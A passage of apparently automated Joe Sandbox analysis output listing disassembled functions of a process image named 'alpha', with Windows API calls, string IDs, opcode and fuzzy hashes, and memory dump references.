                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb3adba76d44d4c03cd449947189e6f6e065ebe28477fb015ad2447aa49876c8
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38A1C330A0429D9BDB34CB6ADC88BB977B1BF44318F2422ACD90AB7391D7719D81DB51
                                                                                                                                                                                                                                                                                                                                                      Function 00EF3065 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                                                                                                                                                                                                                                                                                                      • String ID: +-~!$/$/
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2191331888-1430673670
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6a92bb092e176c32102bc284f46703cf69eff4adc752f8603a4ea23ea4232ccd
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3f16ce11eecb9b695146e6d169d495c3441aac0465312b4165fd48baaba24d94
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a92bb092e176c32102bc284f46703cf69eff4adc752f8603a4ea23ea4232ccd
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2851AC7140060DEBCB14EF64D8498FB37A9EF05324B219126FE16AB150EBB5DF01DBA1
                                                                                                                                                                                                                                                                                                                                                      Function 00F053AA Relevance: 18.2, APIs: 12, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9E8E: iswspace.MSVCRT ref: 00EE9E9E
                                                                                                                                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 00F05406
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00F0541C
                                                                                                                                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 00F0544C
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00F0546B
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F0547B
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F05497
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00F0549F
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F054B3
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00F054D4
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 00F05501
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00F05557
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00F05578
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4166807220-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 696615629bab8dca039ee479af9e35bf691331874403ead2d25642f2a651c872
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5d6ee95c3b2ab09afe1bd514c29273ba7976d762f81776a29b039324488dacc0
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 696615629bab8dca039ee479af9e35bf691331874403ead2d25642f2a651c872
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7151C5319002189BDB34AB70DC197BA77E9FF00724F1484A9E486D21D1EFB48E81EF91
                                                                                                                                                                                                                                                                                                                                                      Function 00EE7610 Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00EE7669
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EE7670
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00EE7686
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EE768D
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EE7719
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EE772B
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EE7758
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EFAA79
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 435930816-3086019870
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: f629ef6e1fc0ca9f4cf29f402a4476c22aa6a06a283c72b43b23ff83a084d798
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f945de90152f634b7543ae04bb4a949c4b79b902e9f26b3c9a7e067019c796d2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f629ef6e1fc0ca9f4cf29f402a4476c22aa6a06a283c72b43b23ff83a084d798
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 665149712087899FD724DF36AC0597637D4EF04319B28546EE486EB291FF20D802DB66
                                                                                                                                                                                                                                                                                                                                                      Function 00EE8F21 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 389COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EE8FCD
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EE8FE3
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00EE9002
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE9013
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA62F: wcschr.MSVCRT ref: 00EEA635
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID: n
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2943530692-874609620
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: acf97c7ffa0ae4ee89f17254db14dc701703d555936635a7f1a97318321b845a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1cdb64cfc852305bba060f6cd1b94b9f529cd8a3aa5f992dc057e3af03aa8abd
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acf97c7ffa0ae4ee89f17254db14dc701703d555936635a7f1a97318321b845a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7C14831A0025D9BCF28DF7AC8852BAB3F5AF48358F24A029E606F72D1EB749D41D751
                                                                                                                                                                                                                                                                                                                                                      Function 00F0AEBD Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 266COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0AF04
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0AF2E
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00F0AF58
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,00EE250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 00F0B08B
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 00F0B095
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 00F0B0AA
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00F0B1DA
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00F0B1F2
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 00F0B20A
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                                                                                                                                                                                                      • String ID: %04X-%04X
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2748242238-1126166780
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8a78a5d430e64dc464556fc5e505f1c78f462056a46eb0c3e4272599cf3c3bc8
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 487a53c97657a33789815c416ac8f48296560be22ec6a2873bd9c7274e838ceb
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a78a5d430e64dc464556fc5e505f1c78f462056a46eb0c3e4272599cf3c3bc8
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C91A0B1E002299BDB24DB24CC95BEAB7B9EF54354F4405E9F509E3180EB349E84AF90
                                                                                                                                                                                                                                                                                                                                                      Function 00EEBC30 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID: =,;
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3458554142-1539845467
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c60c979f844abd220d6e36a6ad8060dab82719014a3ca6285568193707383818
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8e121eb00ab648563d14c286fb1ae69e4e574575adf513e099cc96e23fcfbf73
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c60c979f844abd220d6e36a6ad8060dab82719014a3ca6285568193707383818
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2181C57090029EC7DB309F56CC557BB73B5EF10309F24686AE94AB7250EB758D84CB61
                                                                                                                                                                                                                                                                                                                                                      Function 00EF23F0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF2431
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF2452
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF247C
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00EE250C,00000000,00000000,?,-00000105,-00000105,-00000105), ref: 00EF2585
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EF25A3
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00EF25CA
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00EF25E3
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 00EFF32B
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$InformationVolume_wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: FAT
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4247940253-238207945
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ddad1890b5e47c936335251dcb96c6898197afcbcceaa6c3d971707a0533075f
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 46c788773e80e5ba1e1a18645af675052000ec8b4d481bc1e6fc99e867293f88
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddad1890b5e47c936335251dcb96c6898197afcbcceaa6c3d971707a0533075f
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B5150B2A0021D9BEB24DB64DC95BFA77B8EB44305F1410ADE605F3191EB749E84CE25
                                                                                                                                                                                                                                                                                                                                                      Function 00EE7334 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE7381
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,?,00000000,?), ref: 00EE73D6
                                                                                                                                                                                                                                                                                                                                                      • wcsncmp.MSVCRT ref: 00EE73F9
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000209,?,00000000,?), ref: 00EE7465
                                                                                                                                                                                                                                                                                                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00001037,00000000,?,?), ref: 00EFA8C6
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF0060: wcschr.MSVCRT ref: 00EF006C
                                                                                                                                                                                                                                                                                                                                                      • wcsstr.MSVCRT ref: 00EFA87E
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00EFA89B
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00EFA8DE
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF589A: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00EF59D0,?,00EE6054,-00001038,00000000,?,?), ref: 00EF58BB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF589A: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00EF59D0,?,00EE6054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00EF58CD
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8B4D: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00F099FD,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EE8B7B
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                                                                                                                                                                                                                                                      • String ID: \\.\
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 799470305-2900601889
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1f191ff292be2a2d5489ed9f270d40e6ad02691173f302d18c83676c3e738634
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 259d1703d9450c2c2615bc02e72f3fcd922990a284261fb463f9a0df76882094
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f191ff292be2a2d5489ed9f270d40e6ad02691173f302d18c83676c3e738634
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A5169716083899BC734DF71988857B7AE8EF44354F04182AF9A9E3281EB70CC058763
                                                                                                                                                                                                                                                                                                                                                      Function 00EECB09 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$iswspace$_wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: &<|>$+: $=,;
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3089800946-2256444845
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a370be1cad0cdaf3eef36074a73d023c160abf91949daf434e13517681e574fe
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 14fdcc541be619d44ca99f664ba49433502ea11a711cfdc3b42e035e83a6c760
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a370be1cad0cdaf3eef36074a73d023c160abf91949daf434e13517681e574fe
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7315D31A0136C47CB308F66AC497AE7BA6AF55309F141069EE09F3122F7319D65CB93
                                                                                                                                                                                                                                                                                                                                                      Function 00F0BAF8 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 336COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C0F8: free.MSVCRT ref: 00F0C116
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00F0C0F8: free.MSVCRT ref: 00F0C123
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A30,00000001,00000000,?,00000000), ref: 00F0BB97
                                                                                                                                                                                                                                                                                                                                                      • qsort.MSVCRT ref: 00F0BC1A
